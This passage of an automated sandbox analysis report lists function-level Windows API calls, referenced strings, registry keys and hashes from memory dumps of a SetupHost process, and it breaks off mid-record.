                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85113D3BA082159BDF2C9725BC41F7B3675DBC1761F14803AEA46C71C0E6B24D42825D
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 009B82EB
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 009B8331
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009B835F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingsValues, xrefs: 009B8310
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String$AllocFreeH_prolog3
                                                                                                                                                                                                                • String ID: CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingsValues
                                                                                                                                                                                                                • API String ID: 2967515224-193024389
                                                                                                                                                                                                                • Opcode ID: 34a833409905d29474973c596960094de532af684d9a027a9cd817f54e122907
                                                                                                                                                                                                                • Instruction ID: a25f5a74a5a7b5aae43ac2b46cedf6399883e475b8b807a60c1c9597e449e576
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34a833409905d29474973c596960094de532af684d9a027a9cd817f54e122907
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C012B75A44310CBCB219F10CA40BAE76AAAFD8F30F188516ED046F380CBB48C02DB91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 009B8376
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 009B83BC
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009B83EA
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingsParameters, xrefs: 009B839B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String$AllocFreeH_prolog3
                                                                                                                                                                                                                • String ID: CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingsParameters
                                                                                                                                                                                                                • API String ID: 2967515224-2852037422
                                                                                                                                                                                                                • Opcode ID: 40d182c4d82fa11e4ac27fd5bb16c216ac0a373782aff8706aaee137d08258b8
                                                                                                                                                                                                                • Instruction ID: 743a26fb00590820d502060d0b4cb021565a5ab8400d50464b3f1a4280eea198
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40d182c4d82fa11e4ac27fd5bb16c216ac0a373782aff8706aaee137d08258b8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5501F771A41314DBDB21AF50CA40BAFB5AAABC8B30F154526ED156F381CBB48C81D7D1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 009B8401
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 009B8467
                                                                                                                                                                                                                  • Part of subcall function 009B858F: __EH_prolog3.LIBCMT ref: 009B8596
                                                                                                                                                                                                                  • Part of subcall function 009B858F: SysFreeString.OLEAUT32(00000000), ref: 009B86B4
                                                                                                                                                                                                                  • Part of subcall function 009B858F: GetProcessHeap.KERNEL32(00000000,00000000), ref: 009B86C1
                                                                                                                                                                                                                  • Part of subcall function 009B858F: HeapFree.KERNEL32(00000000), ref: 009B86C8
                                                                                                                                                                                                                • _wtoi.MSVCRT ref: 009B8452
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingAsDword, xrefs: 009B8420
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Free$H_prolog3HeapString$Process_wtoi
                                                                                                                                                                                                                • String ID: CMoSetupOneSettingsHelperT<class CEmptyType>::GetSettingAsDword
                                                                                                                                                                                                                • API String ID: 3600190553-2059675238
                                                                                                                                                                                                                • Opcode ID: 68aa89152f1da0c12c2c531240cf6fc4f1fa930ffe36ed3b10bf466613233c1f
                                                                                                                                                                                                                • Instruction ID: a4296c5d5995af7c94e67adde2add2e611fb946fb692f0905beb379fe054d2c3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68aa89152f1da0c12c2c531240cf6fc4f1fa930ffe36ed3b10bf466613233c1f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC016D716003269BCB11AF648A41AEF766AAF8C720F108425FA146B291CF748902DB91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RtlRaiseStatus.NTDLL(C00000E5,00000000,?,?,?,00000000), ref: 009CF822
                                                                                                                                                                                                                  • Part of subcall function 009DB3AC: DbgPrintEx.NTDLL ref: 009DB3F2
                                                                                                                                                                                                                  • Part of subcall function 009DB3AC: RtlRaiseStatus.NTDLL(C0000420), ref: 009DB400
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • RtlCreateDefaultMicrodomXmlWriter, xrefs: 009CF7E9
                                                                                                                                                                                                                • onecore\base\xml\udom_writer.cpp, xrefs: 009CF7DE
                                                                                                                                                                                                                • Not-null check failed: Writer, xrefs: 009CF7F7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: RaiseStatus$Print
                                                                                                                                                                                                                • String ID: Not-null check failed: Writer$RtlCreateDefaultMicrodomXmlWriter$onecore\base\xml\udom_writer.cpp
                                                                                                                                                                                                                • API String ID: 1346358973-1161048080
                                                                                                                                                                                                                • Opcode ID: 887128e3b7da0510d6bcc1831a5c13662d0f3de2a93af1d272918d677f709143
                                                                                                                                                                                                                • Instruction ID: 267062dc65cd427dc57728167aaafb0af612073a87f5b777a5c5fb658c5b7325
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 887128e3b7da0510d6bcc1831a5c13662d0f3de2a93af1d272918d677f709143
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4DF0A471D0122597DB149B988D24F9E7AAAAB84318F118078E802A7110D770DE09CAE2
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 009FEA59
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: GetCurrentProcess.KERNEL32(?,SYSTEM\Setup\MoSetup\Volatile,00000000,00000000,?,SYSTEM\Setup\MoSetup\Volatile,?,00000000), ref: 009BD0D0
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: IsWow64Process.KERNEL32(00000000,?,00000000), ref: 009BD0D7
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: GetLastError.KERNEL32(?,00000000), ref: 009BD0E1
                                                                                                                                                                                                                  • Part of subcall function 009BD0B5: RegCloseKey.ADVAPI32(?), ref: 009BD13F
                                                                                                                                                                                                                • RegDeleteValueW.ADVAPI32 ref: 009FEA86
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009FEAB8
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • SOFTWARE\Microsoft\SQMClient\Windows, xrefs: 009FEA68
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseProcess$CurrentDeleteErrorH_prolog3LastValueWow64
                                                                                                                                                                                                                • String ID: SOFTWARE\Microsoft\SQMClient\Windows
                                                                                                                                                                                                                • API String ID: 3316648701-3695330318
                                                                                                                                                                                                                • Opcode ID: 31f1106f7fc57dc7de04168d2fe912a49521e7e380a93a1c971ed1c393f50be7
                                                                                                                                                                                                                • Instruction ID: 60aa5f2c847ba69c21c03aa1eef194529499de6c14c31a0c34461ff66d3f0836
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31f1106f7fc57dc7de04168d2fe912a49521e7e380a93a1c971ed1c393f50be7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A901A971A1021E9BDF11EBA4CD057FE76B6BFC0321F104118F1156B1E1DB754901DB51
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009DB3AC: DbgPrintEx.NTDLL ref: 009DB3F2
                                                                                                                                                                                                                  • Part of subcall function 009DB3AC: RtlRaiseStatus.NTDLL(C0000420), ref: 009DB400
                                                                                                                                                                                                                • RtlRaiseStatus.NTDLL(00000000,C000000D), ref: 009C734C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • RtlIsMicrodomUpdateContextValid(TheContext), xrefs: 009C7334
                                                                                                                                                                                                                • onecore\base\xml\udom_modify.cpp, xrefs: 009C731B
                                                                                                                                                                                                                • Windows::uDom::Rtl::RtlDestroyMicrodomUpdateContext, xrefs: 009C7326
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: RaiseStatus$Print
                                                                                                                                                                                                                • String ID: RtlIsMicrodomUpdateContextValid(TheContext)$Windows::uDom::Rtl::RtlDestroyMicrodomUpdateContext$onecore\base\xml\udom_modify.cpp
                                                                                                                                                                                                                • API String ID: 1346358973-3284681492
                                                                                                                                                                                                                • Opcode ID: 5f59cd4805050976fe9f7a001f14331e76e02e49e462a61cb80a2fb874bfd623
                                                                                                                                                                                                                • Instruction ID: 14c92d36d38e2fc3e4ebc675229ce516b0fd1cb64a0093f84a2ab63f9b3944fb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f59cd4805050976fe9f7a001f14331e76e02e49e462a61cb80a2fb874bfd623
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74F09AB0E01209ABCF04EFE8D945BAEBBF8BF94304F40845DA002B7241DB749A44CF90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32 ref: 009C1124
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009C1136
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,SYSTEM\CurrentControlSet\Control\MiniNT,00000000,00020019,00000000), ref: 009C1145
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • SYSTEM\CurrentControlSet\Control\MiniNT, xrefs: 009C111E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseErrorLastOpen
                                                                                                                                                                                                                • String ID: SYSTEM\CurrentControlSet\Control\MiniNT
                                                                                                                                                                                                                • API String ID: 3190611558-2757998475
                                                                                                                                                                                                                • Opcode ID: f4c4a30f3e5da93c41a6938e8bc9c76b8e8b659f5977b7cd1da0829e2f6da960
                                                                                                                                                                                                                • Instruction ID: 6747c635ff1b8465899dd9095f545aff4d4a11e6e8c634a1799e59f760c78b65
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4c4a30f3e5da93c41a6938e8bc9c76b8e8b659f5977b7cd1da0829e2f6da960
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1E06531A98324FBDB2087A19C09FDEBA7CDB46B65F105014B601A1041D6749A01E7F9
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InitializeCriticalSection.KERNEL32(00A16788), ref: 009E248C
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: GetLastError.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB6D8
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: GetCurrentThreadId.KERNEL32(?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB6EC
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: RtlAcquireResourceShared.NTDLL ref: 009EB6FC
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: RtlReleaseResource.NTDLL(00A16750), ref: 009EB728
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: SetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB766
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,009DE5CA,?,00000000), ref: 009EB773
                                                                                                                                                                                                                  • Part of subcall function 009EB6C3: HeapFree.KERNEL32(00000000), ref: 009EB77A
                                                                                                                                                                                                                • DeleteCriticalSection.KERNEL32(00A16788,00000041,8007000E), ref: 009E24B9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • onecore\base\ntsetup\opktools\osimage\lib\utility\utility.c, xrefs: 009E24A6
                                                                                                                                                                                                                • WimAtExitInitialize, xrefs: 009E24AE
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CriticalErrorHeapLastResourceSection$AcquireCurrentDeleteFreeInitializeProcessReleaseSharedThread
                                                                                                                                                                                                                • String ID: WimAtExitInitialize$onecore\base\ntsetup\opktools\osimage\lib\utility\utility.c
                                                                                                                                                                                                                • API String ID: 1862357073-591673898
                                                                                                                                                                                                                • Opcode ID: 2ed47c320692a6438ca738e83e0c3455bc1ed239c8b795fd55c9e10dfe25fe23
                                                                                                                                                                                                                • Instruction ID: 8c0cffd7926b3f886cde9c3dd45b576e4448daa93cea0ad0db107680b1341636
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ed47c320692a6438ca738e83e0c3455bc1ed239c8b795fd55c9e10dfe25fe23
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09E0D83620417053C222539EAC09BDB5D6C9BC17B07164025F609971E0DAB48C8382B0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009E55C6: CreateFileW.KERNEL32(00000000,C0000000,00000007,00000000,00000002,-080000FF,00000000), ref: 009E5625
                                                                                                                                                                                                                  • Part of subcall function 009DF4B4: GetFileSizeEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,009E34C3,00000000,?,?,00000000,00000000,?,00000000,009DDD88), ref: 009DF50C
                                                                                                                                                                                                                  • Part of subcall function 009DF4B4: GetLastError.KERNEL32(?,?,009E34C3,00000000,?,?,00000000,00000000,?,00000000,009DDD88,?,00000000,00000000,00000000), ref: 009DF516
                                                                                                                                                                                                                  • Part of subcall function 009DF4B4: GetLastError.KERNEL32(?,?,009E34C3,00000000,?,?,00000000,00000000,?,00000000,009DDD88,?,00000000,00000000,00000000), ref: 009DF52C
                                                                                                                                                                                                                  • Part of subcall function 009DF4B4: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,009E34C3,00000000,?,?,00000000,00000000,?,00000000), ref: 009DF58E
                                                                                                                                                                                                                  • Part of subcall function 009DF4B4: HeapFree.KERNEL32(00000000), ref: 009DF595
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,?,00000000,009DDD88,?,00000000,00000000,00000000,?,009DE028,?,00000000), ref: 009E353B
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009E3546
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000000,009DDD88,?,00000000,00000000), ref: 009E3557
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E355E
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,00000000,?,00000000,009DDD88,?,00000000,00000000), ref: 009E3569
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorHeapLast$FileFreeProcess$CloseCreateHandleSize
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3165482735-0
                                                                                                                                                                                                                • Opcode ID: 4ba104f2e35bdba65a916e1f5341ec2e020d1da92958a5c33217801e7c2a629a
                                                                                                                                                                                                                • Instruction ID: fe30baaf6f22221627e9274344df3a474bb62705e3400bb139f4de4a923fd2c1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4ba104f2e35bdba65a916e1f5341ec2e020d1da92958a5c33217801e7c2a629a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 73319671E002806BDB16ABBAD84AB7E766E9FC0714F188559F50697392DF748E028650
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memmove$memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3790616698-0
                                                                                                                                                                                                                • Opcode ID: f5e8b80cc53a07e9b85e5f8db9c5971bcee2114a5c2b002ab0708202fed7e79f
                                                                                                                                                                                                                • Instruction ID: 6f106243f05ac24ab97ecfa67856ca6b400caa5d956643fc871c3eab48197e9e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5e8b80cc53a07e9b85e5f8db9c5971bcee2114a5c2b002ab0708202fed7e79f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51215172600608AFD724DFA9CD86DBBB7EDEF88714B14062DE546C7A41DA70FD818B50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,00000000), ref: 009EA2CD
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009EA2D4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 009EA327
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009EA32E
                                                                                                                                                                                                                • SetLastError.KERNEL32(0000000E), ref: 009EA343
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocErrorFreeLast
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3300557996-0
                                                                                                                                                                                                                • Opcode ID: 63b22de3d9baff039f4e4e405a461afe21f74ad4a0db7ca2f67afdf6c71fb3f9
                                                                                                                                                                                                                • Instruction ID: ab4ebe308c2091bf61943392af4e5ed2161c73c43054129dd68651d67a2bac50
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 63b22de3d9baff039f4e4e405a461afe21f74ad4a0db7ca2f67afdf6c71fb3f9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6219075E003459FCB15CFAAC9847AEBBB9FF98711F148058D515A7350C770AD018B91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 009E0A48
                                                                                                                                                                                                                  • Part of subcall function 009BE595: _vsnwprintf.MSVCRT ref: 009BE5C7
                                                                                                                                                                                                                  • Part of subcall function 009C0DBA: HeapAlloc.KERNEL32(?,00000008,00000001,00000000,00000000,00000000,009BE9B6,?,009BE738,009BE360,00000000), ref: 009C0E57
                                                                                                                                                                                                                  • Part of subcall function 009BE2CF: GetFileAttributesW.KERNEL32(00000000,?,00000000,00000000,009C076D,?,00000000,00000000,00000000,009DE497,?,00000000), ref: 009BE2F1
                                                                                                                                                                                                                  • Part of subcall function 009BE2CF: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 009BE321
                                                                                                                                                                                                                  • Part of subcall function 009BE2CF: HeapFree.KERNEL32(00000000,?,00000000), ref: 009BE328
                                                                                                                                                                                                                  • Part of subcall function 009BE2CF: SetLastError.KERNEL32(00000000,?,00000000), ref: 009BE32F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E0A9D
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E0AA4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E0ACA
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E0AD1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess$AllocAttributesErrorFileLast_vsnwprintfmemset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4166850453-0
                                                                                                                                                                                                                • Opcode ID: d243318ae709186c551a64f668d39d2a0d80052830d360562e2966da3d877326
                                                                                                                                                                                                                • Instruction ID: ad7ca5e2037669f1afaaf04147b6272b183ddeb5391993211f774cbbd9080c6b
